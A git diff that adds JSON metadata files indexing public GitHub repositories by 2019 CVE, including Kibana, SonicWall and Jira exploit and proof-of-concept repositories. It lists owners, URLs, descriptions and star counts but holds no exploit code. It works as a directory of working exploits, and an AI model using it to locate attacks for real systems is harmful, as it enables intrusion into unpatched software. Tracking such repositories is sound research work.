"description": null, + "fork": false, + "created_at": "2020-11-03T07:04:15Z", + "updated_at": "2020-11-03T07:07:26Z", + "pushed_at": "2020-11-03T07:07:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7357.json b/2019/CVE-2019-7357.json new file mode 100644 index 0000000000..83d9eebf13 --- /dev/null +++ b/2019/CVE-2019-7357.json @@ -0,0 +1,33 @@ +[ + { + "id": 311562422, + "name": "CVE-2019-7357", + "full_name": "ngpentest007\/CVE-2019-7357", + "owner": { + "login": "ngpentest007", + "id": 50012770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50012770?v=4", + "html_url": "https:\/\/github.com\/ngpentest007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ngpentest007\/CVE-2019-7357", + "description": null, + "fork": false, + "created_at": "2020-11-10T06:07:42Z", + "updated_at": "2020-11-10T06:24:16Z", + "pushed_at": "2020-11-10T06:24:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7406.json b/2019/CVE-2019-7406.json new file mode 100644 index 0000000000..8368257bed --- /dev/null +++ b/2019/CVE-2019-7406.json @@ -0,0 +1,33 @@ +[ + { + "id": 462035961, + "name": "alonzzzo", + "full_name": "Alonzozzz\/alonzzzo", + "owner": { + "login": "Alonzozzz", + "id": 100165245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100165245?v=4", + "html_url": "https:\/\/github.com\/Alonzozzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alonzozzz\/alonzzzo", + "description": "Changelog CVE-2021-33044,CVE-2021-33045 Identity authentication bypass vulnerability found in some Dahua products CVE-2021-27248,CVE-2021-27249,CVE-2021-27250,CVE-2021-34860,CVE-2021-34861,CVE-2021-34862,CVE-2021-34863 Multiple vulnerabilities in DAP-2020 H\/W rev. Ax with F\/W v1.01 and below HTTP Path Traversal CVE-2019-7406 RCE vulnerability in TP-Link Wi-Fi Extenders via a malformed user agent field in HTTP headers CVE-2020-2501,CVE-2021-28797 Stack Buffer Overflow in QNAP Surveillance Station CVE-2021-34730 Critical UPnP Service Flaw on Cisco Small Business RV Series Routers CVE-2020-35785 Multiple HTTP authentication vulnerabilities on DGN2200v1", + "fork": false, + "created_at": "2022-02-21T21:22:43Z", + "updated_at": "2022-02-21T21:22:43Z", + "pushed_at": "2022-02-21T21:23:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7482.json b/2019/CVE-2019-7482.json new file mode 100644 index 0000000000..d907ee4bbb --- /dev/null +++ b/2019/CVE-2019-7482.json @@ -0,0 +1,95 @@ +[ + { + "id": 241446643, + "name": "CVE-2019-7482", + "full_name": "singletrackseeker\/CVE-2019-7482", + "owner": { + "login": "singletrackseeker", + "id": 450060, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/450060?v=4", + "html_url": "https:\/\/github.com\/singletrackseeker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/singletrackseeker\/CVE-2019-7482", + "description": "SonicWall CVE-2019-7482", + "fork": false, + "created_at": "2020-02-18T19:17:55Z", + "updated_at": "2020-02-18T19:17:55Z", + "pushed_at": "2020-02-18T19:17:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 243230873, + "name": "CVE-2019-7482", + "full_name": "b4bay\/CVE-2019-7482", + "owner": { + "login": "b4bay", + "id": 49787265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49787265?v=4", + "html_url": "https:\/\/github.com\/b4bay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b4bay\/CVE-2019-7482", + "description": "CVE-2019-7482 tracking", + "fork": false, + "created_at": "2020-02-26T10:06:22Z", + "updated_at": "2024-06-05T13:38:28Z", + "pushed_at": "2020-03-02T14:51:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 334379066, + "name": "sonicwall-cve-2019-7482", + "full_name": "w0lfzhang\/sonicwall-cve-2019-7482", + "owner": { + "login": "w0lfzhang", + "id": 23116071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23116071?v=4", + "html_url": "https:\/\/github.com\/w0lfzhang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w0lfzhang\/sonicwall-cve-2019-7482", + "description": null, + "fork": false, + "created_at": "2021-01-30T09:50:47Z", + "updated_at": "2022-11-09T18:11:03Z", + "pushed_at": "2021-02-05T08:59:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7489.json b/2019/CVE-2019-7489.json new file mode 100644 index 0000000000..abd00c06fa --- /dev/null +++ b/2019/CVE-2019-7489.json @@ -0,0 +1,33 @@ +[ + { + "id": 360172359, + "name": "CVE-2019-7489", + "full_name": "nromsdahl\/CVE-2019-7489", + "owner": { + "login": "nromsdahl", + "id": 438050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/438050?v=4", + "html_url": "https:\/\/github.com\/nromsdahl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nromsdahl\/CVE-2019-7489", + "description": "Exploit code for CVE-2019-7488 and CVE-2019-7489 resulting in remote code execution.", + "fork": false, + "created_at": "2021-04-21T13:02:03Z", + "updated_at": "2024-07-03T16:37:41Z", + "pushed_at": "2021-04-21T13:03:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7609.json b/2019/CVE-2019-7609.json new file mode 100644 index 0000000000..fac6b59097 --- /dev/null +++ b/2019/CVE-2019-7609.json @@ -0,0 +1,324 @@ +[ + { + "id": 215933649, + "name": "kibana-RCE", + "full_name": "jas502n\/kibana-RCE", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/kibana-RCE", + "description": "kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609", + "fork": false, + "created_at": "2019-10-18T03:25:22Z", + "updated_at": "2024-02-21T16:04:30Z", + "pushed_at": "2019-10-22T06:44:20Z", + "stargazers_count": 90, + "watchers_count": 90, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 90, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 216505019, + "name": "CVE-2019-7609", + "full_name": "mpgn\/CVE-2019-7609", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2019-7609", + "description": "RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer", + "fork": false, + "created_at": "2019-10-21T07:32:31Z", + "updated_at": "2024-10-04T07:05:52Z", + "pushed_at": "2019-12-20T14:28:44Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "kibana", + "rce" + ], + "visibility": "public", + "forks": 12, + "watchers": 54, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 216602890, + "name": "CVE-2019-7609", + "full_name": "LandGrey\/CVE-2019-7609", + "owner": { + "login": "LandGrey", + "id": 16769779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16769779?v=4", + "html_url": "https:\/\/github.com\/LandGrey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LandGrey\/CVE-2019-7609", + "description": "exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts", + "fork": false, + "created_at": "2019-10-21T15:31:13Z", + "updated_at": "2024-11-13T06:49:42Z", + "pushed_at": "2023-08-29T17:49:28Z", + "stargazers_count": 161, + "watchers_count": 161, + "has_discussions": false, + "forks_count": 64, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "kibana", + "python", + "rce" + ], + "visibility": "public", + "forks": 64, + "watchers": 161, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 225175128, + "name": "CVE-2019-7609", + "full_name": "hekadan\/CVE-2019-7609", + "owner": { + "login": "hekadan", + "id": 57190788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57190788?v=4", + "html_url": "https:\/\/github.com\/hekadan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hekadan\/CVE-2019-7609", + "description": null, + "fork": false, + "created_at": "2019-12-01T14:29:22Z", + "updated_at": "2022-06-25T03:46:49Z", + "pushed_at": "2019-12-01T14:34:37Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 21, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 252699702, + "name": "CVE-2019-7609", + "full_name": "rhbb\/CVE-2019-7609", + "owner": { + "login": "rhbb", + "id": 62225834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62225834?v=4", + "html_url": "https:\/\/github.com\/rhbb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhbb\/CVE-2019-7609", + "description": null, + "fork": false, + "created_at": "2020-04-03T10:23:03Z", + "updated_at": "2020-11-04T16:51:09Z", + "pushed_at": "2020-04-03T10:23:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 399335924, + "name": "CVE-2019-7609", + "full_name": "dnr6419\/CVE-2019-7609", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2019-7609", + "description": "Kibana Prototype Pollution", + "fork": false, + "created_at": "2021-08-24T04:38:26Z", + "updated_at": "2021-08-25T01:42:36Z", + "pushed_at": "2021-08-25T01:42:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 457656206, + "name": "CVE-2019-7609", + "full_name": "wolf1892\/CVE-2019-7609", + "owner": { + "login": "wolf1892", + "id": 24608781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24608781?v=4", + "html_url": "https:\/\/github.com\/wolf1892", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wolf1892\/CVE-2019-7609", + "description": "docker lab setup for kibana-7609", + "fork": false, + "created_at": "2022-02-10T06:22:54Z", + "updated_at": "2022-02-10T06:22:54Z", + "pushed_at": "2022-02-10T06:27:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 471037246, + "name": "cve-2019-7609", + "full_name": "Cr4ckC4t\/cve-2019-7609", + "owner": { + "login": "Cr4ckC4t", + "id": 63863112, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63863112?v=4", + "html_url": "https:\/\/github.com\/Cr4ckC4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cr4ckC4t\/cve-2019-7609", + "description": "Kibana <6.6.0 RCE written in python3", + "fork": false, + "created_at": "2022-03-17T15:33:33Z", + "updated_at": "2023-12-27T15:06:52Z", + "pushed_at": "2022-03-17T15:49:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-7609", + "exploit-dev", + "python36", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667208426, + "name": "CVE-2019-7609-KibanaRCE", + "full_name": "OliveiraaX\/CVE-2019-7609-KibanaRCE", + "owner": { + "login": "OliveiraaX", + "id": 131061822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131061822?v=4", + "html_url": "https:\/\/github.com\/OliveiraaX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OliveiraaX\/CVE-2019-7609-KibanaRCE", + "description": null, + "fork": false, + "created_at": "2023-07-17T01:42:09Z", + "updated_at": "2023-10-31T11:33:58Z", + "pushed_at": "2023-07-17T01:44:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808895702, + "name": "CVE-2019-7609", + "full_name": "Akshay15-png\/CVE-2019-7609", + "owner": { + "login": "Akshay15-png", + "id": 93660973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93660973?v=4", + "html_url": "https:\/\/github.com\/Akshay15-png", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akshay15-png\/CVE-2019-7609", + "description": "Exploit for CVE-2019-7609 in python ", + "fork": false, + "created_at": "2024-06-01T05:10:58Z", + "updated_at": "2024-07-30T16:50:50Z", + "pushed_at": "2024-07-30T16:50:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7616.json b/2019/CVE-2019-7616.json new file mode 100644 index 0000000000..9556620a05 --- /dev/null +++ b/2019/CVE-2019-7616.json @@ -0,0 +1,33 @@ +[ + { + "id": 268730987, + "name": "CVE-2019-7616", + "full_name": "random-robbie\/CVE-2019-7616", + "owner": { + "login": "random-robbie", + "id": 4902869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4902869?v=4", + "html_url": "https:\/\/github.com\/random-robbie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/random-robbie\/CVE-2019-7616", + "description": "POC for CVE-2019-7616 \/ ESA-2019-09", + "fork": false, + "created_at": "2020-06-02T07:28:13Z", + "updated_at": "2022-06-16T11:16:09Z", + "pushed_at": "2020-06-02T07:29:20Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7642.json b/2019/CVE-2019-7642.json new file mode 100644 index 0000000000..294449a65e --- /dev/null +++ b/2019/CVE-2019-7642.json @@ -0,0 +1,33 @@ +[ + { + "id": 173723117, + "name": "CVE-2019-7642", + "full_name": "xw77cve\/CVE-2019-7642", + "owner": { + "login": "xw77cve", + "id": 48202281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48202281?v=4", + "html_url": "https:\/\/github.com\/xw77cve", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xw77cve\/CVE-2019-7642", + "description": null, + "fork": false, + "created_at": "2019-03-04T10:24:04Z", + "updated_at": "2022-05-10T04:43:54Z", + "pushed_at": "2019-03-04T11:04:30Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7839.json b/2019/CVE-2019-7839.json new file mode 100644 index 0000000000..cf377cfc9b --- /dev/null +++ b/2019/CVE-2019-7839.json @@ -0,0 +1,33 @@ +[ + { + "id": 200336681, + "name": "CVE-2019-7839", + "full_name": "securifera\/CVE-2019-7839", + "owner": { + "login": "securifera", + "id": 12126525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12126525?v=4", + "html_url": "https:\/\/github.com\/securifera", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securifera\/CVE-2019-7839", + "description": "CVE-2019-7839", + "fork": false, + "created_at": "2019-08-03T05:39:22Z", + "updated_at": "2024-08-12T19:51:39Z", + "pushed_at": "2019-08-03T05:47:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8014.json b/2019/CVE-2019-8014.json new file mode 100644 index 0000000000..f20a12d0ca --- /dev/null +++ b/2019/CVE-2019-8014.json @@ -0,0 +1,33 @@ +[ + { + "id": 479879016, + "name": "CVE-2019-8014", + "full_name": "f01965\/CVE-2019-8014", + "owner": { + "login": "f01965", + "id": 29837345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29837345?v=4", + "html_url": "https:\/\/github.com\/f01965", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f01965\/CVE-2019-8014", + "description": null, + "fork": false, + "created_at": "2022-04-10T00:53:46Z", + "updated_at": "2022-04-10T01:00:22Z", + "pushed_at": "2022-04-10T01:02:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8331.json b/2019/CVE-2019-8331.json new file mode 100644 index 0000000000..284edf30aa --- /dev/null +++ b/2019/CVE-2019-8331.json @@ -0,0 +1,64 @@ +[ + { + "id": 495308692, + "name": "https-nj.gov---CVE-2019-8331", + "full_name": "Snorlyd\/https-nj.gov---CVE-2019-8331", + "owner": { + "login": "Snorlyd", + "id": 93614879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93614879?v=4", + "html_url": "https:\/\/github.com\/Snorlyd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Snorlyd\/https-nj.gov---CVE-2019-8331", + "description": "Vulnearability Report of the New Jersey official site", + "fork": false, + "created_at": "2022-05-23T07:48:19Z", + "updated_at": "2022-05-23T12:10:19Z", + "pushed_at": "2022-05-23T08:13:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689195418, + "name": "CVE-2019-8331", + "full_name": "Thampakon\/CVE-2019-8331", + "owner": { + "login": "Thampakon", + "id": 119696243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119696243?v=4", + "html_url": "https:\/\/github.com\/Thampakon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Thampakon\/CVE-2019-8331", + "description": "ช่องโหว่ CVE-2019-8331", + "fork": false, + "created_at": "2023-09-09T04:03:06Z", + "updated_at": "2023-09-09T04:03:07Z", + "pushed_at": "2023-09-11T05:46:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8341.json b/2019/CVE-2019-8341.json new file mode 100644 index 0000000000..531ef18df4 --- /dev/null +++ b/2019/CVE-2019-8341.json @@ -0,0 +1,33 @@ +[ + { + "id": 441362156, + "name": "llama_facts", + "full_name": "adindrabkin\/llama_facts", + "owner": { + "login": "adindrabkin", + "id": 47116975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47116975?v=4", + "html_url": "https:\/\/github.com\/adindrabkin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adindrabkin\/llama_facts", + "description": "Web application vulnerable to Python3 Flask SSTI (CVE-2019-8341)", + "fork": false, + "created_at": "2021-12-24T04:08:44Z", + "updated_at": "2023-05-24T22:01:49Z", + "pushed_at": "2023-05-24T22:11:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8389.json b/2019/CVE-2019-8389.json new file mode 100644 index 0000000000..c45541bb6a --- /dev/null +++ b/2019/CVE-2019-8389.json @@ -0,0 +1,33 @@ +[ + { + "id": 171097356, + "name": "CVE-2019-8389", + "full_name": "shawarkhanethicalhacker\/CVE-2019-8389", + "owner": { + "login": "shawarkhanethicalhacker", + "id": 41706151, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41706151?v=4", + "html_url": "https:\/\/github.com\/shawarkhanethicalhacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shawarkhanethicalhacker\/CVE-2019-8389", + "description": " [CVE-2019-8389] An exploit code for exploiting a local file read vulnerability in Musicloud v1.6 iOS Application ", + "fork": false, + "created_at": "2019-02-17T08:10:50Z", + "updated_at": "2024-08-12T19:45:53Z", + "pushed_at": "2019-02-17T08:40:06Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8449.json b/2019/CVE-2019-8449.json new file mode 100644 index 0000000000..c14e2f73a2 --- /dev/null +++ b/2019/CVE-2019-8449.json @@ -0,0 +1,79 @@ +[ + { + "id": 237801987, + "name": "CVE-2019-8449", + "full_name": "mufeedvh\/CVE-2019-8449", + "owner": { + "login": "mufeedvh", + "id": 26198477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26198477?v=4", + "html_url": "https:\/\/github.com\/mufeedvh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mufeedvh\/CVE-2019-8449", + "description": "CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4", + "fork": false, + "created_at": "2020-02-02T16:42:32Z", + "updated_at": "2024-08-12T19:57:17Z", + "pushed_at": "2020-02-03T15:11:25Z", + "stargazers_count": 67, + "watchers_count": 67, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-8449", + "cve-exploit", + "exploit", + "exploit-code", + "exploit-database", + "exploitdb", + "exploiting-vulnerabilities", + "exploits", + "jira", + "jira-api", + "jira-issue", + "jira-rest-api", + "vulnerability" + ], + "visibility": "public", + "forks": 20, + "watchers": 67, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 240484095, + "name": "CVE-2019-8449", + "full_name": "r0lh\/CVE-2019-8449", + "owner": { + "login": "r0lh", + "id": 51697374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51697374?v=4", + "html_url": "https:\/\/github.com\/r0lh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0lh\/CVE-2019-8449", + "description": "User Enumeration Proof Of Concept Exploit for CVE-2019-8449", + "fork": false, + "created_at": "2020-02-14T10:33:00Z", + "updated_at": "2023-09-05T20:09:58Z", + "pushed_at": "2020-02-24T12:43:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-8451.json b/2019/CVE-2019-8451.json new file mode 100644 index 0000000000..52e1ff8741 --- /dev/null +++ b/2019/CVE-2019-8451.json @@ -0,0 +1,126 @@ +[ + { + "id": 208774563, + "name": "CVE-2019-8451", + "full_name": "0xbug\/CVE-2019-8451", + "owner": { + "login": "0xbug", + "id": 12611275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12611275?v=4", + "html_url": "https:\/\/github.com\/0xbug", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xbug\/CVE-2019-8451", + "description": "https:\/\/jira.atlassian.com\/browse\/JRASERVER-69793", + "fork": false, + "created_at": "2019-09-16T10:39:40Z", + "updated_at": "2019-11-06T12:26:45Z", + "pushed_at": "2019-09-16T10:47:45Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 210587808, + "name": "CVE-2019-8451", + "full_name": "ianxtianxt\/CVE-2019-8451", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2019-8451", + "description": null, + "fork": false, + "created_at": "2019-09-24T11:38:20Z", + "updated_at": "2021-11-19T03:11:07Z", + "pushed_at": "2019-09-24T11:40:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 211003999, + "name": "CVE-2019-8451", + "full_name": "jas502n\/CVE-2019-8451", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-8451", + "description": "Jira未授权SSRF漏洞", + "fork": false, + "created_at": "2019-09-26T05:06:11Z", + "updated_at": "2024-02-20T09:22:52Z", + "pushed_at": "2019-09-30T01:45:50Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 211424148, + "name": "Jira-CVE-2019-8451", + "full_name": "h0ffayyy\/Jira-CVE-2019-8451", + "owner": { + "login": "h0ffayyy", + "id": 6510183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6510183?v=4", + "html_url": "https:\/\/github.com\/h0ffayyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h0ffayyy\/Jira-CVE-2019-8451", + "description": "POC to check for Jira instances vulnerable to CVE-2019-8451", + "fork": false, + "created_at": "2019-09-28T01:01:26Z", + "updated_at": "2023-11-16T12:51:47Z", + "pushed_at": "2019-09-28T03:13:25Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No 